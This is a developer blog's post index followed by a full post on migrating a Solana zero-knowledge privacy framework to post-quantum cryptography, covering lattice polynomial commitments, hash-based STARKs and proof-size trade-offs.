# Skill Issue Dev | Dax the Dev

> I'm a Nuclear Engineer turned Software Engineer. I'm passionate about learning and sharing my knowledge with others. I'm currently working on a few projects and I'm always looking for new opportunities to learn and grow.

## Posts

- [The post-quantum migration path: lattice commitments, STARK wrapping, isogeny credentials](https://blog.skill-issue.dev/blog/post_quantum_relayerless_path/): Series finale. Shor's algorithm breaks every elliptic-curve assumption F_RP currently rests on. The migration: lattice polynomial commitments (Brakedown/Orion), hash-based STARKs as universal backend, isogeny group actions for credentials.
- [MEV resistance: why UPEE is sandwich-proof by construction](https://blog.skill-issue.dev/blog/mev_resistance_in_private_execution/): Theorem 7.3 — UPEE transactions resist sandwich/frontrun/liquidation MEV by construction. Theorem 7.4 — block MEV bounded by public-bit leakage, not transaction value. Independent of V, not super-linear.
- [F_RP vs Zcash, Tornado, RAILGUN, Aztec, Penumbra, Aleo, Namada, Monero](https://blog.skill-issue.dev/blog/f_rp_vs_existing_privacy_systems/): F_RP vs nine deployed privacy systems on the four axes that matter: relayer-free, Turing-complete, on-chain verifiable on a high-perf L1, low-trust setup.
- [Fitting F_RP in 656 bytes on Solana](https://blog.skill-issue.dev/blog/solana_instantiation_656_bytes/): Concrete F_RP instantiation on Solana. Groth16 over BN254, Poseidon Merkle, indexed nullifier tree, BN254 Pedersen, transaction in 656 of 1,232 bytes, 235K of 1.4M CU.
- [UPEE: composing SPST + PPST + TAB into one framework](https://blog.skill-issue.dev/blog/upee_universal_private_execution/): F_RP Construction IV. The five-algorithm tuple Setup/Deploy/Invoke/Verify/Finalize plus the simulation-based privacy theorem (3.12) and self-sovereignty theorem (3.13). The composition that makes the whole thing deployable.
- [Bayer-Groth verifiable shuffles for network-layer privacy](https://blog.skill-issue.dev/blog/verifiable_shuffles_for_privacy/): F_RP Construction III, Approach C. Bayer-Groth verifiable shuffles obscure the input→output permutation of a batch with O(√n) proof size — used to cascade-mix pre-broadcast batches at the network layer.
- [TAB: hiding the submitter with ring signatures and FROST](https://blog.skill-issue.dev/blog/tab_threshold_anonymous_broadcast/): F_RP Construction III. ZK proofs hide the contents but the wrapping Solana tx still leaks the submitter pubkey. TAB closes that gap with a Fujisaki-Suzuki ring signature and a FROST threshold Schnorr over Ed25519.
- [On the death of the trusted setup](https://blog.skill-issue.dev/blog/on_the_death_of_the_trusted_setup/): Universal SRS, transparent FRI, and why Groth16's per-circuit ceremony feels anachronistic in 2026 — even when, as ZERA does, you're still using one. A history of the ceremonies that worked, the ones that didn't, and what comes next.
- [WASM-native proving for ZK SDKs: an SDK author's take](https://blog.skill-issue.dev/blog/wasm_native_proving_sdk_authors_take/): Why zera-sdk ships native Rust on Node and snarkjs in the browser — and what it would actually cost to ship a WASM-compiled Rust prover for the browser path. A design post about the dual-target build pipeline.
- [Plonky3, the small-fast-cheap revolution](https://blog.skill-issue.dev/blog/plonky3_small_fast_cheap/): Why plonky3 — small fields, FRI commitments, no trusted setup — is the proof system to watch in 2026. The Mersenne31 / BabyBear / Goldilocks landscape, the FRI folding step, and why your laptop is suddenly a viable prover.
- [Recursive proof composition without the abyss: Halo to Nova](https://blog.skill-issue.dev/blog/recursive_proofs_halo_to_nova/): The path from Halo's accumulation scheme to Nova's folding scheme, derived from the recurrence relation. Where Halo2, Nova, SuperNova, and HyperNova actually differ, and which one to reach for in 2026.
- [PPST: extending SPST to arbitrary private computation](https://blog.skill-issue.dev/blog/ppst_private_programmable_state/): F_RP Construction II. Generalises SPST to private programmable state: arbitrary arithmetic circuits over committed pre/post-state, with R1CS-embedded program execution and atomic PPST-SPST composition.
- [Halo2 in 2026: what changed since the Zcash era](https://blog.skill-issue.dev/blog/halo2_in_2026_what_changed/): A survey of the Halo2 ecosystem six years after the Zcash team published it — what stayed the same (PLONKish, lookups, IPA), what evolved (KZG, gadget libraries, fork landscape), and what we ship today.
- [From sailor to CEO in three acts](https://blog.skill-issue.dev/blog/sailor_to_ceo_three_acts/): A short memoir of a strange decade — Navy reactor compartments, a bitcoin mine, ConsenSys-USAA-PMG, and the arc that ended at Zera Labs. The interesting question is not how I got here. It is where everyone else is going.
- [SPST: a self-paying shielded transaction model](https://blog.skill-issue.dev/blog/spst_self_paying_shielded_transactions/): First construction in F_RP. The SPST relation, balance conservation under DLOG, double-spend resistance under collision-resistant PRF, unlinkability under DDH, simulation-extractable non-malleability.
- [Circom, by example](https://blog.skill-issue.dev/blog/circom_by_example/): A DSL primer told through one circuit — proving knowledge of a Poseidon pre-image. Every Circom keyword annotated as it appears, the constraint graph drawn out, and the R1CS fall-through to a witness.
- [Proving in the browser, by the numbers](https://blog.skill-issue.dev/blog/proving_in_the_browser_by_the_numbers/): What is actually feasible inside a browser tab in 2026 — Groth16 prover times for Poseidon, Range, and Merkle circuits, the WASM threading story, and where the main thread stops being a viable home for your prover.
- [Merkle inclusion proofs over compressed account state on Solana](https://blog.skill-issue.dev/blog/merkle_inclusion_compressed_solana/): How a 32-byte hash and a logarithmic path replace a multi-kilobyte account. Walk the tree-height math, the Light Protocol compressed-account model, and an inclusion-proof construction you can run in Node.
- [The fee paradox: why every smart-contract privacy mixer needs a relayer](https://blog.skill-issue.dev/blog/the_fee_paradox/): On account-model chains the very act of paying a transaction fee deanonymises the recipient. This post formalises the paradox, walks through three resolutions, and sets up the SPST construction that resolves it inside the ZK proof itself.
- [Relayerless privacy on a Turing-complete L1: an intro to F_RP](https://blog.skill-issue.dev/blog/relayerless_privacy_intro/): A series-opening map of the relayerless full-privacy framework I've been writing up. Five cryptographic games, four constructions (SPST, PPST, TAB, UPEE), one main theorem — and why it matters that the target chain is Solana.
- [Cross-compiling vantad for darwin: Apple Silicon, sign + notarise](https://blog.skill-issue.dev/blog/vanta_darwin_apple_silicon_build/): Shipping vantad as a notarised Mac binary inside a Tauri app meant fixing libconsensus link order, building Rust release with the right target triple, signing every sidecar, and stapling the DMG separately. The notes from the trenches.
- [Vanta Desktop: a Tauri wallet that ships its own full node](https://blog.skill-issue.dev/blog/vanta_desktop_tauri_wallet/): Most desktop wallets are thin RPC clients that talk to somebody else's node. The Vanta desktop app spawns vantad and the L2 sidecar as Tauri sidecar binaries, owns their PIDs, and adopts orphans on restart. Here is how that came together.
- [The vanta sidecar: how a Rust ZK indexer talks to a C++ Bitcoin node](https://blog.skill-issue.dev/blog/vanta_sidecar_architecture/): vantad is C++. The ZK index is Rust. They cooperate over RPC and a REST API, with the C++ verifier linked statically through libvanta_verifier.a. Here is the audit-surface trade we made and what the sidecar actually does.
- [Why we shipped SP1 instead of RISC Zero](https://blog.skill-issue.dev/blog/vanta_sp1_zkvm_circuits/): Vanta's earliest design notes said 'RISC Zero zkVM.' Production ships SP1 + Plonky3. The swap was cheap because the privacy protocol is independent of the prover. Here is why we moved, what stayed the same, and what the FFI verifier looks like.
- [Tauri 2.x sidecars in anger: the ergonomics paper-cuts I had to fix](https://blog.skill-issue.dev/blog/vanta_tauri_ergonomics/): externalBin wants a target-triple suffix nobody documents loudly enough. The dev resolver walks up parents. Startup must be sequenced. The setup-sidecars.sh + resolve_binary() story for shipping a wallet that runs its own node.
- [Vanta: a Bitcoin fork with ZK at consensus](https://blog.skill-issue.dev/blog/vanta_zk_privacy_l1/): 42 billion supply. 1-minute blocks. RISC Zero proofs verified at consensus. The opinionated answer to 'why fork Bitcoin in 2026?' is that you're not really forking Bitcoin — you're shipping a different L1 that has Bitcoin's surface area.
- [Poseidon, by hand and by code](https://blog.skill-issue.dev/blog/poseidon_by_hand_and_by_code/): Why one of the cheapest hashes in zero-knowledge cryptography also has the strangest insides. Derive the S-box, count the constraints, and run a 30-line implementation in the browser.
- [Stuck Sell, Post-Graduation: Fixing a Trapped-Funds Bug Without a Redeploy](https://blog.skill-issue.dev/blog/stuck_sell_post_grad/): A graduated launchpad token left users unable to sell. Fix shipped without redeploying the program: a frontend conversion path that withdraws SPL, compresses, then sells through the AMM.
- [Being CEO and still shipping code](https://blog.skill-issue.dev/blog/being_ceo_and_still_shipping_code/): The CTO-vs-CEO false dichotomy, why I still review every PR that touches the SDK core, and how I use Claude Code plus an MCP server over my own writing to keep technical leverage as the company grows.
- [btc-tunnel.sh: SSH-jumping into a remote bitcoind for swap testing](https://blog.skill-issue.dev/blog/vanta_btc_tunnel_dev_environment/): Three small bash scripts wire the desktop dev environment to a real mainnet bitcoind for atomic-swap testing. Tunneling, RPC wrapping, and an address watcher with auto-reconnect — and why exposing 8332 to the internet is a worse idea than you think.
- [Block explorers for privacy chains: a Rust indexer for vanta](https://blog.skill-issue.dev/blog/vanta_explorer_rust_indexer/): Patching btc-rpc-explorer got us to 'works.' Then we wrote vanta-explorer in Rust + React: an Axum backend, SQLite indexer, and a SPA that renders shielded transfers as opaque commitments without lying about what it knows.
- [iroh in production: encrypted-note gossip on a 1-minute-block chain](https://blog.skill-issue.dev/blog/vanta_iroh_gossip_in_production/): Why vanta-node uses iroh-gossip for L2 P2P instead of libp2p, what the topic + ALPN setup actually looks like, the GossipMessage shape, and the saturating-decrement bug that taught me an event ordering lesson.
- [L1 nullifier sets: enforcing no-double-spend at consensus](https://blog.skill-issue.dev/blog/vanta_l1_nullifier_set/): Most privacy chains track spent notes in a wallet-side index and pray. Vanta puts the nullifier set in chainstate and lets the consensus rules do the praying. Here's why that line moved, and what it costs.
- [What's in vanta/papers — reading 17 design docs in 2026](https://blog.skill-issue.dev/blog/vanta_papers_design_doc_tour/): Vanta ships its whitepaper as 17 markdown files in the repo, not a PDF on a marketing page. This is the tour: what each doc covers, which one has the wording bug, and why the docs live next to the code.
- [Private atomic swaps and the price-discovery problem](https://blog.skill-issue.dev/blog/vanta_private_atomic_swaps/): BTC ↔ VANTA atomic swaps via HTLC are the easy part. If the VANTA leg is shielded, no observer can compute the rate, and no rate means no public price. Walking through six designs and the hybrid recommendation in vanta/planning.
- [BIP-199 by hand: a code walk through vanta-swap](https://blog.skill-issue.dev/blog/vanta_swap_htlc_walkthrough/): A line-by-line tour of the Rust HTLC state machine that drives BTC ↔ VANTA atomic swaps. Redeem script bytes, the 2x/1x timelock dance, BIP143 sighash binding, and the witness layout that makes refund and claim routes provably distinct.
- [The unified dashboard: collapsing private and transparent into one wallet view](https://blog.skill-issue.dev/blog/vanta_unified_dashboard_wallet_ui/): Two pages — one for private balance, one for transparent — taught users to think in two heads. The 2026-04-17 commit folded them. The wallet now shows one balance, one feed, with the privacy boundary inside the data, not the URL.
- [The vanta wallet HTTP API: an Axum bridge to vantad RPC](https://blog.skill-issue.dev/blog/vanta_wallet_axum_api/): Before the Tauri desktop wallet there was an Axum web wallet. It is a five-route Rust service that wraps vantad's JSON-RPC and serves a single static page. Boring on purpose — and the boring is the point.
- [Stratum v1, the from-scratch Python version](https://blog.skill-issue.dev/blog/vanta_stratum_python_pool/): Solo mining Vanta requires a Stratum server. Public-pool is fine for normal chains; mandatory privacy pushes the pool toward shielded coinbases, encrypted-note submission, and an L2 retry queue. pool/stratum_server.py does it all in stdlib Python.
- [Mining VANTA with a Bitaxe BM1368](https://blog.skill-issue.dev/blog/mining_vanta_with_a_bitaxe/): A 350 GH/s, ~12 W open-hardware ASIC plugged into a Stratum server I wrote against my own L1. Solo mining isn't economic on Bitcoin in 2026. On a 1-minute-block fork with 100k subsidy, the math changes.
- [Why BN254, and when to switch off it](https://blog.skill-issue.dev/blog/why_bn254_and_when_to_switch/): BN254 is the default curve for production ZK in 2026. The 128-bit security claim is no longer 128 bits, and BLS12-381 is gaining ground. Here is the math, the deployment reality, and the migration path.
- [Privacy's broadband moment](https://blog.skill-issue.dev/blog/privacys_broadband_moment/): ZK got fast, hardware got attestable, AI agents started carrying their own wallets, and regulators stopped trying to ban math. Four curves crossed and privacy stopped being a research topic — it became infrastructure.
- [Generating mempool with a Rust txbot](https://blog.skill-issue.dev/blog/vanta_txbot_synthetic_mempool/): Empty blocks lie. A new chain whose miners are mining empty templates is not exercising any of the code that fails in production. The txbot is a 200-line Rust loop that round-robins coins through 114 addresses to keep mempool honest.
- [Latitude bare-metal primary, Fly.io backup: the deploy story for a 1-min-block chain](https://blog.skill-issue.dev/blog/vanta_flytoml_latitude_baremetal/): Vanta v1 went LIVE on a Latitude bare-metal box at 64.34.82.145:9333 with a Fly.io seed fleet as auto-failover. Why a 1-min-block chain hates cold starts, what the fly.toml has to say about it, and the cost math that picks bare metal.
- [The MCP server inside zera-sdk](https://blog.skill-issue.dev/blog/mcp_server_inside_zera_sdk/): Most SDKs ship as a library. zera-sdk also ships as a Model Context Protocol server. Here is why an AI agent should be able to call shielded-pool primitives directly, and how we keep that interface from becoming a footgun.
- [Range proofs in 80 lines: Pedersen commitments and a tiny Bulletproof](https://blog.skill-issue.dev/blog/range_proofs_in_80_lines/): How a Bulletproof actually compresses a range proof to logarithmic size. Derive the inner-product argument from scratch, run a toy prover/verifier in the browser, and pick the right range-proof primitive for 2026.
- [Nullifiers without the witchcraft](https://blog.skill-issue.dev/blog/nullifiers_without_witchcraft/): Nullifier Generation is on the ZERA front page next to Pedersen Commitments and Zero-Knowledge Proofs. The Rust + TypeScript implementations are six lines apiece. Here is what they actually do, and why the design borrows from Zcash.
- [Pedersen commitments, in production](https://blog.skill-issue.dev/blog/pedersen_commitments_in_production/): ZERA marketing says "Pedersen Commitments" on the cryptography page. The SDK ships Poseidon. Both are right — and the gap between them is the whole story of what shipping ZK in 2026 actually looks like.
- [144 Tests and a Surfpool Devnet](https://blog.skill-issue.dev/blog/zera_sdk_test_suite/): How the Zera SDK got from "scaffolded" to "trustable" — a 144-test Vitest suite, a Surfpool-forked devnet running on a Latitude box, and a quickstart that actually works.
- [Building the ZERA Wallet for desktop, iOS, and Android](https://blog.skill-issue.dev/blog/zera_wallet_three_platforms/): Three platforms, one shielded pool, one design system. The trade-offs of building a wallet that has to feel like cash on a phone, like a tool on a laptop, and the same on both.
- [Zera Wallet v3: ZK Proofs in a Tauri Webview](https://blog.skill-issue.dev/blog/zera_wallet_v3_zkp/): A Tauri 2 desktop wallet that proves Groth16 in the browser, persists encrypted notes locally, talks NFC to physical bearer cards, and never lets the private key out of Rust.
- [x402 Vector 2: partial-signing instruction injection](https://blog.skill-issue.dev/blog/x402_partial_signing_injection/): The x402 client builds and partially signs the entire VersionedTransaction. A facilitator that validates structure but not bytes can co-sign a tx with extra clawback / drain instructions appended after the legitimate transfer.
- [x402 Vector 1: settlement race condition](https://blog.skill-issue.dev/blog/x402_settlement_race_condition/): Coinbase x402's verify→settle pipeline isn't atomic. A client can submit the same PAYMENT-SIGNATURE to multiple facilitators in parallel, or race the facilitator with a direct on-chain submission. Double-spend within blockhash validity (~60s).
- [x402 Vector 3: facilitator gas drain](https://blog.skill-issue.dev/blog/x402_facilitator_gas_drain/): x402 facilitators pay all transaction fees and the spec defines no per-client rate limit. A flood of valid-looking transactions that fail at maximum compute-unit consumption is a per-request economic attack on the facilitator.
- [SOLMAL: the x402 attack surface (series intro)](https://blog.skill-issue.dev/blog/x402_attack_surface_intro/): Mapping the attack surface of Coinbase's x402 micropayment protocol on Solana. Series intro covering the verify→settle pipeline, the actor model, the 9 vectors, and the responsible-disclosure timeline.
- [Building the Zera SDK: Day One](https://blog.skill-issue.dev/blog/zera_sdk_scaffolding/): Sixteen commits in fourteen minutes. The first day of the @zera-labs/sdk monorepo — Rust core via neon-rs, TypeScript scaffolding, Poseidon, Merkle trees, ZK provers, and an MCP server for AI agents.
- [Cruiser: A Tauri Hookup App on iroh, Geohash-Bucketed Presence, and Why P2P Dating Is Actually Fine](https://blog.skill-issue.dev/blog/cruiser_iroh_gossip_p2p/): A Tauri 2 + React + iroh-gossip dating app where peers find each other by geohash, broadcast presence on a topic-per-bucket, and DM each other with consent signals — all without a central server. The architecture is the product.
- [Why I started Zera Labs](https://blog.skill-issue.dev/blog/why_i_started_zera_labs/): Three things became true in the same year — ZK got fast enough, Solana got cheap enough, and AI agents needed verifiable money. Sitting at the intersection felt like a ship date, not a thesis.
- [Prediction Markets, LP Locks, and an Admin Page That Doesn’t Suck](https://blog.skill-issue.dev/blog/prediction_markets_admin/): How I bolted CPMM prediction markets onto ZeraSwap, locked LP for graduated tokens, and built a 5-tab admin panel before the first malicious actor showed up.
- [Five Commits to Get an OG Image Out of a Cloudflare Worker](https://blog.skill-issue.dev/blog/og_pngs_cf_workers/): A 24-minute slog where I got dynamic OG PNG generation to work on Cloudflare Pages Functions. The bug is WebAssembly. The fix is a build-time WASM import.
- [ZeraSwap: An AMM for Compressed Tokens](https://blog.skill-issue.dev/blog/zeraswap_compressed_amm/): Initial commit of the first compressed-token AMM on Solana — Anchor program, x*y=k math, SOL/cToken pairs, and the cyberpunk launchpad UI that grew up around it.
- [ZK-FHIR: A Medical Demo That Doesn’t Leak Patients](https://blog.skill-issue.dev/blog/zera_med_zk_fhir/): Building a RISC Zero zkVM gateway for FHIR-shaped medical records — proofs over private patient data, zero-knowledge insurance claims, and HIV/STI compartmentalization.
- [A Privacy Demo That Works on a Phone: Mobile Drawer, HUD Offsets, and Real Breach Data](https://blog.skill-issue.dev/blog/zera_med_responsive_hud/): Bolting a mobile drawer onto the Zera Med ZK-FHIR demo without breaking the desktop sidebar, fixing AnimatePresence warnings, and updating PrivacyChallenge with 2024-2025 breach data.
- [Zera Janitor: Closing Solana Dust Accounts in Leptos WASM](https://blog.skill-issue.dev/blog/zera_janitor_leptos_wasm/): A Solana program + Leptos 0.7 frontend that scans your wallet for empty SPL token accounts, batches up to 25 closes per transaction via CPI, and pays you back 95% of the rent. The fee path is the actual interesting part.
- [Rebranding to m0n3y and Writing Crypto Docs Like You're 10](https://blog.skill-issue.dev/blog/m0n3y_eli5_rebrand/): The DAXSO → M0N3Y rebrand commit, the burn-to-earn explainer for degens, and an ELI10 walk-through of zk-shielded notes that does not mention the word "circuit" once.
- [Empowering Local Crypto Advocacy](https://blog.skill-issue.dev/blog/congress_crypto/): 
- [m0n3y: Naming a Dream](https://blog.skill-issue.dev/blog/m0n3y_naming_a_dream/): The docs site that came before the code. Looking back at the m0n3y-web init commit and the voting proposal that was supposed to fix DAO whales.
- [TW-TVV: Why Token-Quantity Voting Is Broken, and the Math I Tried to Fix It With](https://blog.skill-issue.dev/blog/m0n3y_tw_tvv_governance/): A full walk-through of the Time-Weighted Tiered Value Voting proposal I drafted for $M0N3Y in 2025. Five tiers, time multipliers, log-scaled volume, and why every variable in the formula is a knob fighting a different attack.
- [Building A Better Cryptocurrency: What We Should Have Done](https://blog.skill-issue.dev/blog/a_better_crypto/): A technical proposal for a truly decentralized digital cash system
- [Listening to the Bluesky Firehose for Accidental Haikus](https://blog.skill-issue.dev/blog/bsky_haiku_firehose/): A Rust firehose listener that decodes ATProto CAR frames live, runs whatlang + syllarust on every English post, and saves the ones that scan as 5-7-5 haikus to disk. There were a lot of haikus.
- [You are thinking about AI wrong.](https://blog.skill-issue.dev/blog/rethink_ai/): We have had how many decades of Science Fiction to prepare us for the future of AI, and yet we are still thinking about it wrong.
- [Rusty Pipes Exploit](https://blog.skill-issue.dev/blog/rusty_pipes_exp/): Using Rust to inject malicious code into npm packages. And hijack your entire node runtime.
- [Youtube Wasting Money on Fake Livestreams](https://blog.skill-issue.dev/blog/ways_to_burn_money_at_google/): One of the biggest ways YouTube is wasting its money is promoting scam and spam prerecorded livestreams.
- [Hungry Git: A Quick Guide to Hacking Orgs and Bots](https://blog.skill-issue.dev/blog/hacking_bots/): Recently more and more people are talking about how insecure GitHub is. This article will show you how to exploit GitHub organizations and bots to get what you want.
- [What running a Bitcoin mine taught me about cloud margins](https://blog.skill-issue.dev/blog/what_running_a_bitcoin_mine_taught_me/): A short stint at Foundry Digital running ASIC fleets, immersion vs. air, the depreciation curve, and the brutal arithmetic of difficulty adjustments — and why I never stopped thinking like an operator after I went back to writing software.
- [Nuclear reactors taught me to ship software](https://blog.skill-issue.dev/blog/nuclear_reactors_taught_me_to_ship/): Watchstanding, casualty drills, and pre-task briefs map onto code review, on-call, and disaster recovery more cleanly than any management book I have ever read.
- [process-thing: An LSB Watermarker for upload-thing, Written in Rust via Neon](https://blog.skill-issue.dev/blog/process_thing_lsb_watermark/): A Rust npm package that embeds invisible watermarks in the least significant bit of every red channel pixel. Built for upload-thing image preprocessing. Cross-compiled for 7 platforms. The README is one paragraph.
- [Rust in Peace: How to Hijack Node.js with a Single Require](https://blog.skill-issue.dev/blog/rusty_pipes_building_supply_chain_malware_for_npm/): Discover how to exploit the Node.js ecosystem with Rust-based supply chain malware. Learn about the vulnerabilities in npm packages and how a single require line can compromise JavaScript projects. Explore security measures to prevent such attacks.
- [The Difference Between Publishers and Developers](https://blog.skill-issue.dev/blog/skg_fixes/): Alot of the time whenever gamers have a problem they blame the developers. But who are they really mad at? Time to take a breath and actually learn who is doing what to whom and how often.
- [Stop Killing Games: A Pricing thought Experiment](https://blog.skill-issue.dev/blog/stop_killing_games_a_pricing_thought_experiment/): After talking with industry and business professionals a very interesting example or better yet expectation of what will happen was put forward by people in business.
- [The Flaws of the #StopKillingGames Initiative: A Developer’s Perspective](https://blog.skill-issue.dev/blog/stop_killing_games/): Surprise, I am not a fan of the Stop Killing Games initiative. It is a flawed approach to addressing the issues in the gaming industry. Let me explain why.
- [Origins of Foo and Bar](https://blog.skill-issue.dev/blog/origins_of_foo_and_bar/): Foo and Bar where did they come from?
- [What is RISC V](https://blog.skill-issue.dev/blog/what_is_risc_v/): What is RISC V, why is it so cool? Why is it so important?
- [Embedded AI](https://blog.skill-issue.dev/blog/embedded_ai/): Unlocking the potential of the Milk-V Duo with embedded AI and Linux-based interrupt handling
- [Rusty Pipes](https://blog.skill-issue.dev/blog/rusty_pipes/): An npm supply chain exploit that checks for what packages you contribute to then injects a malicious rust binary into the next release.
- [Developers in the Job Market](https://blog.skill-issue.dev/blog/developers_in_the_job_market/): Recent studies reveal an alarming increase in fake job postings. This article explores the economic implications of fake job postings and the challenges faced by job seekers in the current market.
- [Rust Type Abuse for Beginners](https://blog.skill-issue.dev/blog/rust_type_abuse_for_beginners/): Explore some simple type system abuse and hacks to get used to the Rust model and syntax of Types
- [Abusing Ts Type System](https://blog.skill-issue.dev/blog/abusing_ts_type_system/): Dive into the world of TypeScript and explores the fascinating aspect of the `Exclude<Low, High>` utility type.
- [Introducing the Milk V](https://blog.skill-issue.dev/blog/introducing_milkv/): Milk-V Duo is an ultra-compact embedded development platform. It can run Linux and RTOS, providing a reliable, low-cost, and high-performance platform for professionals, industrial ODMs, AIoT enthusiasts, DIY hobbyists, and creators.
- [Nix-flakes and Bun](https://blog.skill-issue.dev/blog/nixos_bunjs/): Small update to my development flow and focus. How to get up and running with Bun.js in NixOS.
- [How Random is a Local LLM? A Rust Benchmark with Redis](https://blog.skill-issue.dev/blog/ai37_llm_random_numbers/): A Rust harness that asks Ollama models for "a random number between 1 and 100" thousands of times, parses every response with regex, stores results in Redis, and pits them against a real RNG. Spoiler: 42 wins.
- [Blazingly Fast Drinks: A Repo I Made For The Bit](https://blog.skill-issue.dev/blog/glug_blazingly_fast_drinks/): A Clerk + Next.js + Expo turborepo I called "glug" with the description "Blazingly Fast Drinks". The README never mentioned drinks. The repo description carried the entire joke.

## About

- [About Dax the Dev](https://blog.skill-issue.dev/about)

---

# The post-quantum migration path: lattice commitments, STARK wrapping, isogeny credentials

Canonical: https://blog.skill-issue.dev/blog/post_quantum_relayerless_path/
Description: Series finale. Shor's algorithm breaks every elliptic-curve assumption F_RP currently rests on. The migration: lattice polynomial commitments (Brakedown/Orion), hash-based STARKs as universal backend, isogeny group actions for credentials.
Published: 2026-05-16T15:00:00.000Z
Tags: zk, post-quantum, lattice, stark, csidh, sqisign, phd


import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

The whole F_RP framework, as written today, is **completely broken by Shor's algorithm**. Every elliptic-curve assumption the construction rests on — DLOG on Curve25519, q-PKE on BN254, q-DLOG on the Pasta cycle — falls in polynomial time on a sufficiently large fault-tolerant quantum computer. Pedersen commitments lose binding. Groth16 loses soundness. Ed25519 signatures lose unforgeability. The entire stack is a pre-quantum house.

Today this is fine. NIST estimates a cryptographically-relevant quantum computer is still 10-20 years away. But "we'll fix it later" is exactly how we got into the SHA-1 / RSA-1024 / DES situation. The right time to design the migration path is **before** there's a deadline.

This is post 11 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series — the finale.

<Aside kind="note">
This post is more speculative than the previous ten. The constructions that survive a quantum adversary are still being benchmarked and standardised. What's *certain* is that any post-quantum F_RP loses the 128-byte Groth16 proof and the ~150K CU verification cost. What's *uncertain* is exactly how much we lose.
</Aside>

## What Shor breaks, in one paragraph

Shor's algorithm gives a quantum polynomial-time reduction from integer factoring and discrete log to period-finding. RSA, classical Diffie-Hellman, DSA, ECDSA, Ed25519, Schnorr signatures, BLS signatures, Pedersen commitments, Pairings — every cryptographic primitive that relies on the hardness of DLOG or factoring is compromised.

For F_RP specifically, the four broken pieces:

1. **Groth16 over BN254.** q-PKE / q-DLOG → polynomial-time forgery.
2. **Pedersen commitments over BN254.** DLOG → binding broken; commitments become equivocable.
3. **Ed25519 signatures.** DLOG → forgery, including FROST threshold variants.
4. **CSIDH and other classical isogeny constructions.** Kuperberg's quantum sub-exponential algorithm threatens them more aggressively than classical attacks.

Hash-based primitives survive: SHA-2, SHA-3, Keccak, Poseidon (modulo round-by-round cryptanalysis). FRI / STARK proofs survive because they only depend on hash collision resistance, not on any algebraic structure. Lattice-based primitives (Module-LWE, Module-SIS) survive under best-known quantum attacks.

## The replacement stack

| Pre-quantum component | Broken by Shor | Post-quantum replacement | Cost |
|-----------------------|---------------|--------------------------|------|
| Groth16 (BN254) | Yes | STARK (FRI) inner + lattice-SNARK outer | 5-20 KB proof; ~300K CU |
| Pedersen (BN254 𝔾_1) | Yes | Lattice (Module-LWE) commitment | 4-50 KB |
| Ed25519 + FROST | Yes | SQIsign / lattice signatures | 200-2000 B sig |
| KZG (BN254 pairing) | Yes | FRI or Brakedown / Orion | O(log²n) hashes |
| Poseidon hash | No (classical and quantum CR) | Same; possibly Anemoi | unchanged |

Post-quantum F_RP is **5-20 KB per proof** instead of 128 bytes, **~300K CU on-chain** instead of ~150K, and **~5 KB per signature** instead of 64 bytes. The framework still works; the costs grow ~50-100× on every dimension.

## Lattice-based polynomial commitments

The replacement for KZG is a polynomial commitment based on Module-LWE / Module-SIS. Two leading candidates:

### Brakedown (Golovnev, Lee, Setty, Thaler, Wahby — CRYPTO 2023)

Linear-time SNARK based on linear-code polynomial commitments. The prover commits to multilinear polynomials using a linear-time encodable error-correcting code, combined with the Spartan polynomial IOP.

- Prover: `O(N)` field operations for `N`-sized R1CS.
- Proof size: ~1.5 MB for `2^20` multiplication gates (before code-switching compression).
- Verification: linear in proof size.
- No trusted setup.
- Plausibly post-quantum secure (security from collision-resistant hashing + linear-code distance).

The **`O(√N)`** base proof size is the killer for Solana — even the 4,096-byte SIMD-0296 limit isn't enough for a raw Brakedown proof on a meaningful circuit.

### Orion (Xie, Zhang, Song — CRYPTO 2022)

`O(N)` prover time with `O(log²N)` proof size via **code-switching composition**. The code-switching mechanism reduces proof size from `O(√N)` to polylogarithmic by proving that the witness of a secondary zero-knowledge argument coincides with the message in a linear code.

Numbers are still rough — ~10 KB proof for `2^20` constraints — but the trajectory is right. Orion is the most promising candidate for direct on-chain verification on Solana under SIMD-0296.

### Open problem 7.1 — lattice commitment size

Current lattice-based commitments produce opening proofs of size `O(k · d · log q)` bits, yielding 4-50 KB concretely. Determine tight lower bounds for 128-bit post-quantum security; characterise the feasibility space within Solana's tx limit.

## Hash-based STARKs as universal backend

STARKs are already post-quantum (security from collision-resistant hashing only). The migration is simpler in shape but more expensive in proof size:

- **FRI over Goldilocks field** ($p = 2^{64} - 2^{32} + 1$): efficient NTT, native to 64-bit hardware. Plonky3 uses this.
- **FRI over M31 (Mersenne-31)**: SIMD-optimised arithmetic. StarkWare's Circle STARK construction uses M31.

Proof size scaling: `O(λ · log²N)`. For `2^20` steps at 128-bit security, ~50-200 KB per proof.

A **`400×`-`1600×` blowup** vs. Groth16's 128 bytes. Way over Solana's transaction limit. Three deployment paths:

### Path 1: STARK-in-Lattice-SNARK (Open Problem 7.2)

Wrap the STARK verifier circuit inside a lattice-based SNARK to recover succinct on-chain verification. The STARK verifier circuit is `O(log²N)` hash evaluations + field operations. With Poseidon (~250 R1CS constraints per hash), `2^20`-step verification is `~100K` constraints.

Recursive composition:

$$
\pi_{\mathrm{outer}} \;=\; \mathsf{Prove}_{\mathrm{Lattice}}\bigl(\,\mathsf{Verify}_{\mathrm{STARK}}(\pi_{\mathrm{inner}}) = 1\,\bigr).
$$

Estimated proof size: ~5-20 KB. **Marginal fit for SIMD-0296** (4,096-byte transactions). Open whether the lattice outer is small enough.

### Path 2: STARK aggregation (STARKPack)

Aggregate `n` STARK proofs into a single argument that's $(1 + 1/n)$× the size of a single proof, with `~2×` faster verification.

| n packed | Aggregated size | Per-proof verify CU |
|----------|----------------|---------------------|
| 1 | ~100 KB | 500K |
| 10 | ~110 KB | 50K/proof |
| 100 | ~120 KB | 5K/proof |

Doesn't help individual transactions (still 100 KB per submission) but amortises validator-side cost dramatically.

### Path 3: Off-chain STARK with on-chain commitment

The most pragmatic near-term path. Publish the full STARK proof to a data-availability layer (Solana ledger via call-data, or a separate DA chain). On-chain verify only a 32-byte hash commitment. Add a challenge period where any observer can verify the off-chain proof and dispute on-chain if it's invalid.

| Configuration | Proof size | Verify CU | PQ | Fits tx? |
|---------------|-----------|-----------|----|---------|
| Groth16 (current) | 128 B | ~100K | No | Yes |
| Raw STARK | ~100 KB | ~500K | Yes | No |
| STARK + aggregation (n=10) | ~110 KB total | ~50K/proof | Yes | No (on-chain) |
| STARK → Lattice-SNARK wrap | ~5-20 KB est | ~300K est | Yes | Marginal (SIMD-0296) |
